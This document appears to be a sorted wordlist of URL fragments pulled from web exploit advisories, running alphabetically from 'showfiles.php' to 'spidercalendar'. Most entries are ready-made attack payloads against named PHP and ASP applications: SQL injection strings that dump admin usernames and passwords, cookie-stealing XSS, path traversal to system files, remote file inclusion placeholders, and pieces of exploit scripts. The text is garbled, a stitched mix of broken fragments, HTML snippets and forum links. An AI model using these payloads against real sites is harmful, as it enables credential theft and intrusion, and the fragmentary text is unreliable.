showfiles.php?group_id=131995&package_id=148681&release_id=318628
showfiles.php?group_id=132192
showfiles.php?group_id=132702
showfiles.php?group_id=134930
showfiles.php?group_id=136315
showfiles.php?group_id=137531
showfiles.php?group_id=141000
showfiles.php?group_id=142506&package_id=156487
showfiles.php?group_id=143555&package_id=232638&release_id=636935
showfiles.php?group_id=145557 ;
showfiles.php?group_id=145557 ;				 			
showfiles.php?group_id=150989&package_id=166837&release_id=444225
showfiles.php?group_id=152219
showfiles.php?group_id=152660
showfiles.php?group_id=155086&package_id=212714&release_id=466097
showfiles.php?group_id=157964
showfiles.php?group_id=159137&package_id=178594&release_id=619157
showfiles.php?group_id=160753&package_id=191865&release_id=419910
showfiles.php?group_id=160870
showfiles.php?group_id=163847
showfiles.php?group_id=164171
showfiles.php?group_id=164788             |
showfiles.php?group_id=166901&package_id=192077&release_id=420102 ;
showfiles.php?group_id=168535
showfiles.php?group_id=169574&package_id=193438&release_id=426108
showfiles.php?group_id=169754
showfiles.php?group_id=169887
showfiles.php?group_id=170004
showfiles.php?group_id=171166            #####
showfiles.php?group_id=176310
showfiles.php?group_id=177347
showfiles.php?group_id=177958
showfiles.php?group_id=178400
showfiles.php?group_id=178846
showfiles.php?group_id=179905&package_id=207933&release_id=476030
showfiles.php?group_id=182182
showfiles.php?group_id=185482
showfiles.php?group_id=186100
showfiles.php?group_id=188355 idmos1.0
showfiles.php?group_id=191355
showfiles.php?group_id=191629
showfiles.php?group_id=192730
showfiles.php?group_id=193198 {
showfiles.php?group_id=193233
showfiles.php?group_id=193675
showfiles.php?group_id=194532
showfiles.php?group_id=195156&package_id=230351&release_id=533796
showfiles.php?group_id=195547
showfiles.php?group_id=196819
showfiles.php?group_id=197936
showfiles.php?group_id=197936##
showfiles.php?group_id=200632
showfiles.php?group_id=203457
showfiles.php?group_id=204745
showfiles.php?group_id=205263                
showfiles.php?group_id=206129
showfiles.php?group_id=209058
showfiles.php?group_id=211757
showfiles.php?group_id=212495&package_id=255590
showfiles.php?group_id=213524
showfiles.php?group_id=215112
showfiles.php?group_id=220286 
showfiles.php?group_id=221515    
showfiles.php?group_id=230742
showfiles.php?group_id=24742
showfiles.php?group_id=251474
showfiles.php?group_id=3413
showfiles.php?group_id=35550                           
showfiles.php?group_id=38585
showfiles.php?group_id=40166&package_id=32303&release_id=250717
showfiles.php?group_id=41586&package_id=153583&release_id=643010
showfiles.php?group_id=49971&package_id=43403&release_id=325871 ;
showfiles.php?group_id=59828
showfiles.php?group_id=6127
showfiles.php?group_id=63834&package_id=60858
showfiles.php?group_id=64258&package_id=112134&release_id=549549
showfiles.php?group_id=65127                             #
showfiles.php?group_id=70910&package_id=70316&release_id=628868
showfiles.php?group_id=72529
showfiles.php?group_id=74605
showfiles.php?group_id=82171
showfiles.php?group_id=82330
showfiles.php?group_id=83964&package_id=86556
showfiles.php?group_id=86688&package_id=90098]
showfiles.php?group_id=87672&package_id=91447&release_id=326826
showfiles.php?group_id=88942&package_id=93125&release_id=444821
showfiles.php?group_id=8920]
showfiles.php?group_id=91686
showfiles.php?group_id=95133&package_id=101320
showfiles.php?group_id=95430
showfiles.php?group_id=95900 ]
showfiles.php?group_id=98241             #
showflat.php?Cat=document.write(unescape("%3CSCRIPT%3Ealert%28document.domain%29%3B%3C
showflat.php?Cat=&Number=19229%20UNION%20SELECT%201,2%20
showfullimage.php?dir=[dir name][spc]St[spc]Clair&image=<h1>hello<
showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,
showgallery.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showgallery.php?si=&sort=1&cat=501&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showgallery.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showHeadline.inc.php?rel=[cmd_url]
showHeadline.inc.php?rel=[evil_scripts]
show_hlp.php?appl[APPL]=';
show_image_in_imgtag.php?
showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query
showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query
ShowImage.php?name=..
showimages.php?dir=<iframe%20src="C:\"%20width=400%20height=400><
showimg.php?file=
showimg.php?id=%00'
showimg.php?id=8+and+31337-31337=0+--+ 
showInfo.php? livestock_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9
showinphoto.php?pid=[LFI]
show_joined.php?path=..
showmembers.php admin\r\n";
showmembers.php?si=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showmembers.php?si=&sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showmembers.php?si=&sort=4&cat=500&ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showmembers.php?sl='SQL_INJECTION
show_memorial.php?id=100
show_memorial.php?id=[xxx]+and+1=2+union+all+select+1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8+from+admin--
show_memorial.php?id=[xxx][SQLi]
showme.php?user=admin
showmods.php?boardid=[SQL]
showMsg.php?id=-1+union+select+1,2,3,4,5,6,concat(user_id,char(58),password),8,9,10+from+mailmachine_users
showNews.php?newsid=-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login
showNews.php?newsid=39'
showNews.php?newsid=-5+union+select+all+1,version()--
show_news.php?news_id=xx+and+1=0+%20union%20select%20database%28%29,2,3,4,5,6,7..[n]
show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat=
show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP
show_news.php?template=..
shownotes.php?release_id=*
/?show_page=
showPage.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C
showPage.php?id=-348+union+select+1,concat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.users%20--
show_page.php?Page_ID=[sql] 
show_page.php?Page_ID=&table=users' 
showphoto.php?photo=418337 (Sql)
showphoto.php?photo='SQL_ERROR 
showphoto.php?pid=[LFI]
show.php
show.php3?month=99%20union%20select%201,2,3,4,5
show.php?cat=blue&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin
show.php?cat=games&catid=-1'+union+select+1,2,adminpass,4,5,adminn,7,8+from+mobilelib_admin
show.php?catid=5&sch=yellow&language=..
show.php?catid=5&sch=yellow&language=[LFI]
show.php?cat=mms&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin
show.php?cat=msgs&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin
show.php?cat=pro&catid=-1'+union+select+1,2,adminn,adminpass,5,6,7,8,9+from+mobilelib_admin
show.php?cat=sound&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9+from+mobilelib_admin
show.php?cat=themes&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin
show.php?cat=vido&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9,10+from+mobilelib_admin
show.php?cat=wallpapers&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin
show.php?cid=2&page=[Inj3ct]
show.php?file= [inj3ct0r shell]
show.php?id=1
show.php?id=137
show.php?id=154
show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--
show.php?id=1[CODE]
show.php?id=1[SQL CODE]
show.php?id=[Inj3ct]
show.php?id=<SqL Code>                      #
show.php?id=<SqL Code>                  #
show.php?lessid=1%20union%20select%20null,null,null,ModName,ModPassword,ModPassword,ModPassword%20FROM%20modretor
show.php?lid=104'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin
show.php?lid=1'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin
show.php?mod=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
show.php?newspath=
show.php?newspath=[file]%00
show.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--
show.php?page=site&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16#--
show.php?q='
show.php?rand=1&id=[SQL]
show.php?rand=[SQL] 
show.php?show=..
show.php?start=0&id=[SQL]
show.php?start=[SQL]
show.php?UserID=1&MainID=10&SubjectID=[sql]
show.php?UserID=1&MainID=[SQL]&SubjectID=1
show.php?UserID=$UserID&MAINID=6&sobjectID=[SQl]
show.php?UserID=$UserID&MAINID=[SQL]
show.php?user=X-Cisadane )
show.php [VARIABLES]
showpic.php?file=$fi&md5=$md5";
showPortalPage?period=week
showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--
showpost.php?ForumID=1&post=[SQL]
show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23
showpredictionsformatch.php?sid=dupa&matchid=-666
/?show=printpreview&id=..
showproduct.php?product=[query]
show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member
showQAnswer.asp?qNo=441%20union%20select%201,2,Login,4,5,Password,7,8,9,10,11,12,13,14%20from%20member%00
showQAnswer.asp?qNo=[SQL Statement]
showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=
show_search_more.php?job_iid=[id number][SQL]
show_search_result.php?keyword=[sqli]
show_search_result.php?left_cat=[id number][SQL]
show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
show.site.php?id=9
showSource.php?file=config_settings.php
show_source.php?path=
showtext.php?mode=[SQLi]
showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
showThread.inc.php?actualModuleDir=[evil_scripts]
showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day
showthread.php?12527-Security-Fix-ClipBucket-2-6-SQL-Injections-fix-%28Updated%29
showthread.php?366834-vbulletin-4-profile-customization-exploit
showthread.php?3892
showthread.php?...$comma=[SQL]
showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal 
showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C
showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C
showthread.php?p=1106
showthread.php?p=1474
showthread.php?p=1490
showthread.php?p=1521
showthread.php?p=2159503#post2159503
showthread.php?pid='[sql_query]
showthread.php?t=1102593
showthread.php?t=12673
showthread.php?t=152037&page=2 
showthread.php?t=165017
showthread.php?t=21783
showthread.php?t=232684
showthread.php?t=29786
showthread.php?t=31688
showthread.php?t=31814                         |
showthread.php?t=32252
showthread.php?t=588
showthread.php?t=6557
showthread.php?t=725777
showthread.php?t=8643
showthread.php?t=9350
showthread.php?t=9388
showthread.php?t=943260
showthread.php?tid=2559
showthread.php?tid='[sql_query]
showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr
showThumb.aspx (Path disc.)
/?showtopic=47026
showtopic.php?idcat=-1'
showtopic.php?threadid=1&pagenum=[SQL]
/?showtopic='><script>alert(window.document.url)<
/?showuser='><script>alert(document.cookie)<
show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
sh.php
sh.php";
 sh.php\n";
sh.php\n";
sh.php\n\r"
sh-slideshow
s", http_post("includes
s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
shutter.tenfourzero.net
sicherheit_282.htm
sicherheit_286.htm
sicherheit_83.htm
sicherheitslucke-in-xtcommerce
sidb.sourceforge.net
sidebar
sideblock.php?sideblock4=<script>alert(document.cookie);<
sideboxes
side_pullout
side_slideopen
sid.zoology.gla.ac.uk
siena_0914_released
siestta_old
sifront
sige_0.1.tgz
signature.php?uid=1[
signinform.php?msg=
signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C
signinform.php?msg="><script>alert(document.cookie)<
signing_system-admin
signin.php?_AMGconfig[cfg_serverpath]=Attacker
signin.php?errmsg=<script>alert(document.cookie);<
signin.php?sent=1&AMG_serverpath=[evil_script]
signin.php : Vulnerability Input Fields : email , password
signup
signup.html
signup.php
signup.php (first- and last-name)
signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]
signup.php?username=$user&email=$email";
sigs
silentum_guestbook.php
silenz.be
sillaj.sourceforge.net
silurus
silurus.php
simon.vrel.free.fr
simp2
simpgb
simple
simpleassets
simpleassets.sourceforge.net
simpleauction
simplebbs
simpleblog3
simpleBlog.mdb
simplechat_1.0.0
simplecms
simpledefault
simpledemo
simpledirectorylisting.net
simple-download-button_dl.php?file=..
simple-download-button-shortcode
simple-forum
simplehrm
simpleinvoices.org
simpleloginsys
SimpleLoginSys%20v0.5
simplenews
simple-php-agenda
Simple-PHP-Agenda-2.2.8-Cross-Site-Request-Forgery.html
<Simple_Php_Agenda_ip>:80
simple.php?page=..
simplephpweb
simplephpweb-v0.2
simplepms
simplePMS-v0-1-3prealpha
SimplePoll
simplequizz
simplesiteadmin
simple-sqli-dumper-v51-how-to.html
simple.tpl.php?uri=..
simpli-easy-newsletter.php
simpliscms
simplog
simploo
simply_classifieds
simply_image
simply-poll
simpnews
Simpnews
".$simserver;
sinagb.php?fuss=[SHELL]
sinapis.php?fuss=[SHELL]
sindominio.net
sinecms
[sinecms_path]
singapore
singel
single
singlefile.php?cid=100&lid=1156
singlefile.php?cid=102&lid=1398
singlefile.php?cid=28&lid=1243
singlefile.php?cid=40&lid=1511
singlefile.php?cid=43&
singlefile.php?cid=92&lid=1525
singlefile.php?cid=94&lid=1123
singlefile.php?cid=94&lid=1405
singlefile.php?lid=17'
singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
singlefile.php?lid=9
SingleFilter.php?path=<File Inclusion>%00
single.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user(),database()),3,4,5
single.php?id=SQLi
sips
sips_response.php HTTP
sipssys
sir.co.kr
sir.co.kr) is a widely used bulletin board system of Korea.  
sirini.net
sisfokampus.net
sisfokol.bitnet.web.id
sisplet
[sisplet_path]
sistema
sit
site
<site>
" . $site . "
"."$site"."
".$site;
".$site; }
".$site."
[site
[ site ]
[site]
$site
site]
Site
[Site]
SITE
<SITE>
[SITE]
site5-wordpress-theme-diary-sendmail-php-spoofing
siteadmin
SiteAdmin
Site_Admin
site_administrators
SITEANDPATH
SITE_AND_PATH
";                      # site and path to pligg
siteatschool.sourceforge.net
sitebanners
site-builder-software---cms-53489.html 
site.co.il
Site.cOm
SITE.COM
site.com login.php)                             ###
').$site->CONF['hostname'].$site->CONF['wwwroot'].
').$site->CONF[hostname].$site->fdat[url]);
site.config.php
site.cz
site.de
sitedepth
site[dot]com
/?site=evilcode?&cmd= 
SITE_fiche.php?id=136
SITE_fiche.php?id=-136++UNION SELECT 1,2,3,4,5,6,7,8,9,10,motdepasse,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95+from+IFI.CLASSCIMES_EVT_TMP
siteforge-app
siteforge-download-action
siteframe.org
sitefrane.org
sitegenius
site.gov.pl
".$site.$i.$end);
$site" if !($site=~
site.il
site_images
site.ir
site.it
site.korban
sitem
[site]m
siteman2
sitemap
sitemap.class.php?system_path=[evil_scripts]
sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
sitemap.inc.php?path[cb]=[cmd_url]
sitemap.inc.php?path[cb]=[evil_scripts]
sitemap.php
sitemap.php?path= [inj3ct0r sh3ll]
sitemap.scr.php?GLOBALS[PTH][classes]=[include]
sitemap.xml.php?dir[classes]=[Evil_Code]
site.me
sitemgr
sitemgr-site
sitename
[sitename]
Sitename
SITENAME
site (no slash)              |
 si tentative de fraude.
site.org
sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
[SITE][PAHT]
' .$site.$path. '
[sitepath]
".$site.$path."admin
" . $site . $path . "barang.php?produk_id=-9+"
".$site.$path."index.php?pilih=dl&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1
".$site.$path."index.php?pilih=links&mod=yes&aksi=lihat&kategori=&kid=-999'union+select+concat(0x74346d7520,user,0x20673074),0,0,concat(0x67656c347020,password,0x20673074),0,0,0,0,0,0%20from%20user+limit+0,1
".$site.$path."index.php?query=1nj3ks1')union+select+0,concat(0x74346d7520,user,0x20673074),concat(0x67656c347020,password,0x20673074)+from+user+limit+0,1
".$site.$path."products.php?cat=-1%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9,10%20from%20operator"; }
".$site.$path."products.php?cat=-1%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9%20from%20operator"; }
site.php
site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member
site.php?file=patBBCode
site.php?id=%27
site.php?newlanguage=%00'
site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--
site.pl
site_plugin.php?site_plugin_classname=[LFI%00]
sites
site_settings.php 
site_setup.asp
sitesetup.php		    [Vulnerable : name , siteroot]
sitetarget
site-target
site.tld
site.tld  
site.tld ' & ' 
site.tldwordpress
sitetools
Site_Tools
[SITE_URL]
' . $sitevul; }
'.$sitevul; }
sitewat.ch)
[site-with-vote].php?vote=1" method="POST">
[SITE_WITH_XCMS]
sitexs
site.xxx
site_you_control
sitio
sitracker.org
sitzung.php?Modus=Detail&ID=1"<script>alert('y3nh4ck3r+was+here!')<
" size="25" style="background-color: #808080">
" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
" size="25" style="background-color: #808080"><br><input type="text" name="id" value="5" size="25" style="background-color: #808080">
" size="40"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
" size="40"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
" size="50"><BR><BR>
" size="70" onkeyup="generateCSRF();" 
~sjm217
s. jpg? + document.cookie; <
s.jpg? + document.cookie; <
s.jpg?+document.cookie;>
s.jpg? + Document.cookie; <
s.jpg? + Document. cookie; <
s.jpg? + Document.cookie; <
s.jpg? + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0
s . jpg? '+ document.cookie; this.sss = null style = top: expression (eval (this.sss));
skalinks_1_5
skel_null.php?ABTPV_BLOQUE_CENTRAL=
skel_null.php?ABTPV_BLOQUE_CENTRAL=[EVIL_CODE]?
SkillHtmlSearchRenderer.class.php?gfwww=[Shell]
SkillSearchQuery.class.php?gfcommon=[Shell]
skin
skinfiles
skin.php?skin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
skins
skin_shop
sklog
skripts
skrypty
skrypty.webpc.pl
skylined.org
skyportal.net
skysilver
slaed.net
slashcms
slash-cms
slashdot
sleep(10)
slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
slide
slide.class.php?system_path=[evil_scripts]
slidepop1.php
slideshow_full.php?album_name=' 
slideshowgallery
slideshow.joomlaextensions.co.in
slideshow.php?name=<script><
slideshow.php?photo=%22%3E%3Cscript%3Ealert(document.cookie)%3C
slimcms
SlimCMS-1.0.0.tgz?modtime=1217343227&big_mirror=0
/?s=links&id=1 and 1=0 -> False
/?s=links&id=1 and 1=1 -> True
/?s=links&id=1 and ascii(substring(@@version,1,1)=52
slooze
slooze.php?file= [your command]
slooz.php?file=[your command]
slove.php?cid=1&tid=waraxe
slove.php?cid=war'axe&tid=1
slove.php?id=war'axe
slove.php?tid=123&rid=war'axe
slove.php?trans_alert=1&rid=war'axe
s.lp?id=17)   |
sls
slurp)",
slurp)\r\n";
sm3na_authors--
sm-ak051
small-business-panel
smallnuke
small_thumbs
smartcart.asp
smartcms.nl
smartphps
smart-publisher
smarty
smarty_ajax
Smarty_Compiler.class.php
Smarty_Compiler.class.php?_plugins_params=[RFI]
smarty.php?cwd=..
smarty.php?full_path_to_public_program=Evil_script
smb
smbind
smes_thailand
smf
SMF
smf_1-1-3
smf116 -u regular -p test -d
smileys
smileysig2
smilies
smilies.php?action=display&form[]
smod.pl
smpl
sms
smsapi.php?username=yourusername&password=yourpassword&mobile=[Mobile]&sms=[TextMessage]&senderid=[SenderID]&lt;
smscollection.php?cat_id=[Blind SQLi]
sms_config
[sms location]
[snapback]	onerror=script=document.createElement(String.fromCharCode(115,99,114,
Snaps!
snapshots
snarf_ajax.php?url=1&regexres=phpinfo()&regex=
snazzy
sndemo
snews
sNews
snews.awddesign.co.uk
snews.php?act=shownews&id=-23
snews.php?act=shownews&id=[SQL]
snews_user
sniff
sniffer
sniff.jpg?"+document.cookie;<
snif.php
snif.php?download=snif.php%00
snipe
snipegallery
sniper code
sniper.php.rar
sniplets
snippet
snippetmaster
snippets
sn_news
sn-news
snnews\n";
snowcade
so
soap
sobi2_version_2.9.4_released.html  
sobre.php?m=10'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1
sobre.php?m=10"><script>alert('y3nh4ck3r was here!')<
sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1
sobre.php?m=10&y=2007&ord=F"><script>alert('y3nh4ck3r was here!')<
sobre.php?m=10&y=2007"><script>alert('y3nh4ck3r was here!')<
social
socialcms
socialcommunity
social-discussions
social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=
social-discussions-networkpub.php
social-discussions.php
social_discussions_service_names.php
socialengine
socialengine422_trial
social_engine_v2.0.html
social_settings HTTP
Social.Site.Generator.v2._iAG_.Nulled.rar
social-sites
social-slider-2
socialware
socios
sockso
Soco
sofistic.net 
sofistic.net.
sofi_webgui
soft
softdirec
SoftDirect.v1.05.rar.html                                                                                                                            
SoftLink-Content-Management-System---CMS_20_1
SOFTMP3
softmp3.org
softsaurus
software
Software
software_CAD_Technical_60002_uk.htm?currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3C
software-description.php?id=-1%20union%20select%201,2,concat(id,0x3a,admin_name,0x3a,pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1%20from%20sbwmd_admin--
software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
software-directory
software-directory.html ]
Software-Index-P30vel.ir
Software link: https:
software.php 
software.php?ID=1291+[SQL-INJECTION!]--
software.php?ID=1291+[SQL-INJECTION!]-- width="600" height"600"><br>
software.php?plan_id=35&domain=[SQL] 
software.php?plan_id=[SQL]
software_upload
software-zone-a-script-for-selling-your-softwares.html
soft.zoneo.net
sog_form.php?CLASSPATH=[AvriLhea]                
sog_save.php?CLASSPATH=[AvriLhea]
SolidStateModule.class.php?base_path=[evil_scripts]
[solidstate_path]
sol_menu.php?kul_adi="><script>alert(document.cookie)<
solpotcrew.org
solution )
solutions
solutive.net
solvemedia
solvemedia.admin.inc&updated=true">
some
[SOME_CMS]
somecommand.php?somevariables=maliciouscode>
some-cool-domain.tld
somedir USER"
some_doc_url
somefile
some-file
somefolder
somegirl[SQL]
somehost
[somehost]
SOME_HOST
some_inexistent_file_with_long_name.
[some_numbers].php
[someone]
somephpcode.php.kr
somery.danwa.net
someserver
somesite
something
something.html><
someuni.edu.ar
somewebsitesite
[some_wordpress_blog]
somik.org
[sondage_path]
sond_result.php?id_art=-99999
SongForever
songinfo.php?song_id=[sql]
song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
sonic-banda-di-lamer.gay
Sonium_Enterprise_Adressbook_Version_0.2_(folder)_RFI.htm
sonstige
 (soon)        |
 soon mirror attack for sub-z3ro
Soot
soption=0x61646D696E5F6E616D65),0x3a,(SELECT
soption=0x61646D696E5F70617373))
%s" % (options.target+options.directory)
soqor10
sortfieldsjson.php?module_name=..
sortie-de-pluxml-5-1-6
&sort=NomASC&action=upload
sort.php?termid=1 AND EXTRACTVALUE(1,CONCAT(CHAR(92),@@version))
sort.php?termid=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
sort_row.request.php
SOS-09-006.pdf
SOS-11-003.pdf
SOS-11-004.pdf
SOS-11-007.pdf 
SOS-11-012.pdf
SOS-12-002.pdf
SOS-12-011.pdf
source
.source)<
.source%29%3C
sourcebans
/?source=dlp
sourceforge
SourceForge-1.0.4.tgz
sourceforge.net
sourceforge.net 
source.php?p=config.php
source.php?p=[FILE]
source.php?sid=<iframe>
source.php?source=
.source.replace(
sources
/?sources_cms
sourcesup.cru.fr
source_vuln.php?pic=..
sourdough
soustab.php?dsn[phptype]=[LFI%00]
southburn.ca
SP2
spa
space.dl.sourceforge.net
space.php?action=memberlist
sPaiz-Nuke
spamblocker
spaminator
spamoborona.net
spamx
span>
span><
span>    <
span%3E%3C
<span class=\"misctext\">(.*)<\
spareclockcycles.org
spaw
spaw2
SPAW%20PHP%20v.2.0.8.1
spaw_control.class.php?GLOBALS[spaw_root]=[include]
spaw_control.class.php?spaw_root=[cmd_url]
spaw_control.class.php?spaw_root=[Evil_Script]
spaw_control.class.php?spaw_root=[ shell ]?
spaw-php
/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
special
Special
specialacts.php";
Special_Addon_Plugins?cmd=download&id=31
specialdays.php?path_pre=[evil_scripts]
specials.inc.php?subpage=lang&REX[INCLUDE_PATH]=[inj3ct0r sh3ll]
specific.php">
specifics.inc.php
speedberg
/?speed_debug=on&id=0&pg=123
/?speed_debug=on&id=0&pg='+UNION+SELECT+SLEEP(5)%23
Speedy_7296144526.gif
SpellChecker
spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E
spellerpages
sphere.xlentprojects.se
s.php
sphpblog
sphpforum
sphpforum-0.4
%s.php?rr=ls'%(options.ip,options.rootp,shell)
%s.php?rr=ls'%(options.ip, shell)
spicy-blogroll
spicy-blogroll-ajax.php
spicy-blogroll-ajax.php?var2=%s&var4=%s';
spicy-blogroll.php
spidaNews
spiddir
spiderBox
spiderBox.js.php?allImagesQ=<
spiderBox.js.php?darkBG=<
spiderBox.js.php?delay=<
spiderBox.js.php?juriroot=<
spiderBox.js.php?juriroot=%253C%252Fscript%253E%253Cscript%253Ealert%2528123%2529%253B%253C%252Fscript%253E
spiderBox.js.php?slideShowQ=<
spiderBox.js.php?spiderShop=<
spider-calendar
spidercalendarbig.php?calendar_id=1&cur_page_url=&date=D4NB4R'"()%26%251<ScRiPt >prompt()<%2fScRiPt>&day=01&ev_ids=1&eventID=1&theme_id=5
spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5%26D4NB4R%3dD4NB4R >> 127.0.0.1
spidercalendarbig_seemore.php?calendar_id=1&ev_ids=1&theme_id=5&d4nb4r=d4nb4r
